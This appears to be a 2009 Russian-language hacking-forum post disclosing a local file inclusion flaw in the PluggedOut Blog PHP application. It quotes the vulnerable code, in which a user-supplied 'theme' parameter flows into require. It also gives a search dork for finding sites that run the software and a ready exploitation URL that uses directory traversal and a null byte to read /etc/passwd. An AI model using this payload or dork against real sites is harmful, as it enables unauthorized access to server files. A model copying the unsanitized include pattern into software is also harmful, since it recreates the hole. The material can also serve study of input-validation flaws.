27.04.2009, 11:15
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
PluggedOut Blog
download: http://downloads.sourceforge.net/pluggedout/blog199i.zip
dork: "Powered by PluggedOut Blog"
LFI
уязвимый код:
index.php
PHP код:
if ( isset($_REQUEST["entryid"]) ){
if (is_numeric($_REQUEST["entryid"])){
$html = html_view_entry($_REQUEST["entryid"])
cмотрим функцию html_view_entry в файле html.php
PHP код:
function html_view_entry($entryid){
/--/
// Build the page
$html = build_page($sql_list,$sql_view,$sql_archive,$sql_categories,$sql_comments);
return $html;
cмотрим функцию build_page, в этом же файле
PHP код:
function build_page($sql_list,$sql_view,$sql_archive,$sql_categories="",$sql_comments=""){
global $theme;
// work out the current theme (allow for an override though)
if (isset($_REQUEST["theme"])){
$theme = $_REQUEST["theme"];
} else {
$theme = theme_get_name();
}
// include the theme (in order for following function calls to work)
if (file_exists("themes/".$theme."/theme.php")){
require "themes/".$theme."/theme.php";
} else {
header("Location: problem.php?f=build_page&p=theme_not_found");
}
эксплуатирование:
Код:
index.php?entryid=1&theme=../../../../../../../etc/passwd%00
(с) Iceangel_
|
|
|